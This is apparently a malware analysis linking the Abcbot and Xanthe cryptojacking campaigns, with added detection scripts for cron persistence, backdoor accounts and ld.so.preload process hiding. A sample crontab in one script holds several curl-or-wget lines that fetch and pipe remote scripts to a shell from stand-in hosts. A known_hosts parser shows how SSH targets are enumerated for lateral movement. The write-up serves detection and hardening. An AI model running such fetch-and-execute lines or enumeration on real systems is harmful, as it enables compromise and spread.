Abcbot – An Evolution of Xanthe

There are a few infrastructure overlaps. For example, a firewall rule allowing ingress traffic from 64[.]225[.]46[.]44 that is present in the Xanthe sample also appears in the Abcbot sample.
Whilst it is common for cryptojacking malware authors to copy code from one another, there are a number of other similarities, discussed below, which make a direct link in ownership between the Xanthe and Abcbot campaigns more likely.

In the original report from Cisco’s Talos security research team, researchers commented on the coding style of the shell scripts being analysed – in particular, functions being declared at the top of the file and then invoked in some of the later lines.
Talos researchers suggested that this likely aids testing of new iterations, with functionality enabled/disabled through commenting of the lines responsible for function invocation.
Both the Abcbot and Xanthe samples we compared follow this coding style.

Linking these two samples based on code style similarities alone would be tenuous, at best. However, if we look at some of the function names themselves, correlation becomes apparent.
Several of the functions have “go” appended to the end of the function name and some functions have identical names. The following names appear in both samples:

nameservercheck
croncheckgo
checkrc
iptableschecker
filerungo

Comparing the two implementations, the Abcbot version of the nameservercheck function is significantly larger than its Xanthe counterpart.
The Xanthe sample we analyzed is older than the Abcbot sample by over a year (according to VirusTotal submissions).
This could indicate that the Abcbot version of the function has been iterated on several times, with new functionality added at each iteration.

The croncheckgo function in both samples is responsible for achieving persistence via cron, the scheduling utility common to most Linux distributions.
Both samples carry the same TODO comment from the author about adding logic to determine whether cron is running on different Linux distributions; in both, it is still a note rather than working code.
The service command is then used to start the cron service, so that any modifications made to the crontab are honoured by the scheduler.
The cron entries consist of curl commands with explicitly set user-agent strings.
Their purpose is covered in Talos' research, but the strings themselves are telling: fczyo-cron is used in both samples, with a different version number appended in each. Incidentally, one of the payloads downloaded by Xanthe is also named "fczyo".

Reuse of a unique string such as this seems more than coincidental, and suggests that the server-side code for both the Xanthe and Abcbot campaigns expects this string to be present in the user-agent.
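Because the user-agent is set in the cron entry itself, it is a cheap thing to hunt for on a host. The following script is an added example, not code from either campaign or from the original research: it parses crontab lines, pulls out every user-agent a curl command would send (the -A, --user-agent and -H "User-Agent:" spellings), and flags entries matching the fczyo-cron family. The sample crontab, hostnames, paths and version suffixes are constructed; the regex is loose because the exact version strings are not quoted above.

```python
"""Added example (not the campaigns' or Talos' code): flag crontab entries whose
curl command sends a user-agent from the fczyo-cron family discussed above."""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# "fczyo-cron" is the string the analysis reports in both samples. The version
# suffix is an assumption: the exact suffixes are not quoted, so match loosely.
UA_PATTERN = re.compile(r"fczyo-cron\S*", re.IGNORECASE)

# Constructed sample crontab. Hosts, paths and version numbers are invented.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -s -A "fczyo-cron/2.1" http://loader.invalid/update.sh | sh
*/5 * * * * (curl --user-agent fczyo-cron/1.4 -fsSL http://203.0.113.9/x.sh || wget -q -O- http://203.0.113.9/x.sh) | bash
30 2 * * * curl -H "User-Agent: fczyo-cron/3.0" -o /tmp/.x http://loader.invalid/a && sh /tmp/.x
0 * * * * curl -s -A "Mozilla/5.0" https://example.com/health
"""


@dataclass(frozen=True)
class CronFinding:
    line_no: int
    user_agent: str
    command: str


def extract_user_agents(command: str) -> List[str]:
    """Return every user-agent value curl would send for this command text.
    Handles -A value, -Avalue, --user-agent value, --user-agent=value and
    -H "User-Agent: value"."""
    try:
        argv = shlex.split(command)
    except ValueError:
        # Unbalanced quotes: fall back to a raw search so nothing is missed.
        return UA_PATTERN.findall(command)
    agents = []
    for i, tok in enumerate(argv):
        nxt = argv[i + 1] if i + 1 < len(argv) else ""
        if tok in ("-A", "--user-agent"):
            agents.append(nxt)
        elif tok.startswith("-A") and len(tok) > 2:
            agents.append(tok[2:])
        elif tok.startswith("--user-agent="):
            agents.append(tok.split("=", 1)[1])
        elif tok == "-H" and nxt.lower().startswith("user-agent:"):
            agents.append(nxt.split(":", 1)[1].strip())
    return agents


def cron_command(line: str) -> Optional[str]:
    """Return the command part of a crontab line, or None for comments, blank
    lines and malformed entries. Works for @reboot-style lines too."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return None
    if stripped.startswith("@"):
        parts = stripped.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = stripped.split(None, 5)          # five time fields, then the command
    return parts[5] if len(parts) == 6 else None


def find_fczyo_cron_entries(crontab_text: str) -> List[CronFinding]:
    """Scan a crontab and return the entries that carry a matching user-agent."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        command = cron_command(line)
        if command is None:
            continue
        for ua in extract_user_agents(command):
            if UA_PATTERN.search(ua):
                findings.append(CronFinding(no, ua, command))
    return findings


if __name__ == "__main__":
    for f in find_fczyo_cron_entries(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: UA={f.user_agent!r} :: {f.command}")
```

In practice you would feed it the output of crontab -l for each user, the per-user spool files under /var/spool/cron, and /etc/crontab plus /etc/cron.d/*. The system-wide files carry an extra user field before the command; the token scan still finds the user-agent there because it walks every argument of the remainder rather than assuming the command starts at a fixed position.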

Talos researchers noted that Xanthe propagated by enumerating the SSH known_hosts file, allowing the malware to spread to hosts the current victim had previously connected to.
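To make that propagation source concrete, here is an added example (not the malware's code, and not from the original research) that parses a known_hosts file the way an attacker would have to and shows what it yields. Entries written in clear give hostnames and addresses directly; entries written with OpenSSH's HashKnownHosts option store only an HMAC-SHA1 of the hostname under a random salt, so they cannot be enumerated, only confirmed against a guess. The sample file, hostnames and fixed salt are constructed, and the key blobs are placeholders.

```python
"""Added example (not the malware's code): what an attacker can and cannot
learn from ~/.ssh/known_hosts, the propagation source Talos described for
Xanthe. Hashed entries (OpenSSH HashKnownHosts) do not reveal hostnames."""
import base64
import hashlib
import hmac
from typing import List, Tuple


def hash_host(hostname: str, salt: bytes) -> str:
    """Build the |1|<salt>|<hmac> field OpenSSH writes when HashKnownHosts is on:
    the hostname is replaced by HMAC-SHA1 keyed with a random 20-byte salt."""
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|{}|{}".format(base64.b64encode(salt).decode(),
                             base64.b64encode(mac).decode())


def hashed_entry_matches(field: str, candidate: str) -> bool:
    """True if a hashed host field was produced from `candidate`. This is the
    only way to get a name back out of a hashed entry: guess and verify."""
    parts = field.split("|")
    if len(parts) != 4 or parts[1] != "1":
        return False
    salt, mac = base64.b64decode(parts[2]), base64.b64decode(parts[3])
    expected = hmac.new(salt, candidate.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(expected, mac)


def enumerate_targets(known_hosts_text: str) -> Tuple[List[str], int]:
    """Return (hostnames/addresses readable in clear, number of hashed entries)."""
    targets, hashed = [], 0
    for line in known_hosts_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0].startswith("@"):          # @cert-authority / @revoked markers
            fields = fields[1:]
        if len(fields) < 3:                    # host, key type, key blob
            continue
        host_field = fields[0]
        if host_field.startswith("|1|"):
            hashed += 1
            continue
        for name in host_field.split(","):
            if name.startswith("[") and "]:" in name:   # [host]:port form
                name = name[1:name.index("]")]
            if name.startswith("!") or any(c in name for c in "*?"):
                continue                       # negations and patterns are not targets
            targets.append(name)
    return targets, hashed


# Constructed sample file. Key blobs are placeholders, not real public keys;
# the salt is fixed so the hashed entry is reproducible.
SAMPLE_SALT = bytes(range(20))
SAMPLE_KNOWN_HOSTS = (
    "build01.corp.invalid,10.0.4.21 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5PLACEHOLDER\n"
    "[git.corp.invalid]:2222 ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER\n"
    "@cert-authority *.corp.invalid ssh-ed25519 AAAAC3NzaC1lZDI1NTE5PLACEHOLDER\n"
    + hash_host("db01.corp.invalid", SAMPLE_SALT)
    + " ssh-ed25519 AAAAC3NzaC1lZDI1NTE5PLACEHOLDER\n"
)


if __name__ == "__main__":
    clear, hidden = enumerate_targets(SAMPLE_KNOWN_HOSTS)
    print("readable targets:", clear)
    print("hashed entries (names not recoverable without guessing):", hidden)
    field = hash_host("db01.corp.invalid", SAMPLE_SALT)
    print("guess db01.corp.invalid:", hashed_entry_matches(field, "db01.corp.invalid"))
```

The practical takeaway is a hardening one: with HashKnownHosts enabled, a stolen known_hosts file stops being a ready-made target list. It does not make the file useless to an attacker who already has candidate names (hashed_entry_matches shows how cheaply a guess is confirmed), so it raises the cost of this style of lateral movement rather than removing it.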

Our analysis of Abcbot showed code that adds four malicious users to the compromised host, effectively creating four backdoor accounts for the actor to use. The usernames in question were:

logger
sysall
system
autoupdater

In the Xanthe sample, users with the same usernames are added to the system (if they do not already exist).
Similarly, both Abcbot and Xanthe search for and remove users that we assumed belong to competing campaigns.

As researchers at Talos reported, perhaps one of the defining features of Xanthe was its use of an open source process-hiding library, libprocesshider.so. The path to the library was written into /etc/ld.so.preload, so the dynamic loader maps it into every dynamically linked process, where it hooks readdir() to hide the XMRig miner's entry in /proc from tools such as ps and top.

We did not see evidence of this process-hiding technique in the Abcbot sample we analyzed. We did, however, see code referencing the technique, as used in previous campaigns such as Xanthe, in the function kill_miner_proc, which is responsible for clearing artifacts of miners from competing or prior campaigns.
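Both of the artifacts above, the four shared account names and an ld.so.preload entry, are easy to check for on a suspect host. The script below is an added example, not code from the campaigns or from Talos: it parses /etc/passwd content and reports the four usernames from this analysis, and it reports every path listed in /etc/ld.so.preload with a reason, since on a clean host that file is normally absent or empty. The uid-0 check on non-root accounts is a general addition of mine, not something the page states about these campaigns; the passwd and preload contents are constructed.

```python
"""Added example (not the campaigns' code): triage a host for the two artifacts
described above, the shared backdoor account names and a libprocesshider
entry in /etc/ld.so.preload. File contents below are constructed."""
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Account names quoted in the analysis above.
BACKDOOR_USERS = frozenset({"logger", "sysall", "system", "autoupdater"})
SYSTEM_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse /etc/passwd content; skips blank, comment and malformed lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), home, shell))
    return entries


def find_backdoor_accounts(passwd_text: str) -> List[PasswdEntry]:
    """Accounts matching the four names from the analysis, plus (an added
    general check, not something the page states) any uid-0 account that is
    not root."""
    return [e for e in parse_passwd(passwd_text)
            if e.name in BACKDOOR_USERS or (e.uid == 0 and e.name != "root")]


def check_ld_preload(preload_text: str) -> List[Tuple[str, str]]:
    """Every path in /etc/ld.so.preload is mapped into every dynamically linked
    process, which is how libprocesshider gets its hooked readdir() in front
    of ps and top. On a clean host the file is normally absent or empty, so
    every entry is reported with a reason."""
    findings = []
    for line in preload_text.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        if "processhider" in path.lower():
            reason = "libprocesshider: hides processes from /proc readers"
        elif not path.startswith(SYSTEM_LIB_DIRS):
            reason = "preloaded library outside the system library directories"
        else:
            reason = "unexpected preload entry; verify package ownership and hash"
        findings.append((path, reason))
    return findings


def triage(passwd_text: str, preload_text: str) -> Dict[str, list]:
    """Combine both checks into one report."""
    return {
        "backdoor_accounts": find_backdoor_accounts(passwd_text),
        "ld_preload": check_ld_preload(preload_text),
    }


# Constructed sample data for a compromised host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
logger:x:1001:1001::/home/logger:/bin/bash
sysall:x:1002:1002::/home/sysall:/bin/bash
autoupdater:x:0:0::/root:/bin/bash
"""
SAMPLE_PRELOAD = "/usr/local/lib/libprocesshider.so\n"


if __name__ == "__main__":
    report = triage(SAMPLE_PASSWD, SAMPLE_PRELOAD)
    for e in report["backdoor_accounts"]:
        print(f"account {e.name} uid={e.uid} shell={e.shell}")
    for path, reason in report["ld_preload"]:
        print(f"ld.so.preload: {path} ({reason})")
```

One caveat when running this on a live host rather than on copied files: if a preload library is already active, anything that goes through libc, including this script's own directory listings, sees the filtered view. Read /etc/passwd and /etc/ld.so.preload directly, or from a disk image, and treat a preload entry as a reason to verify process listings from outside the host rather than trusting ps on it.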
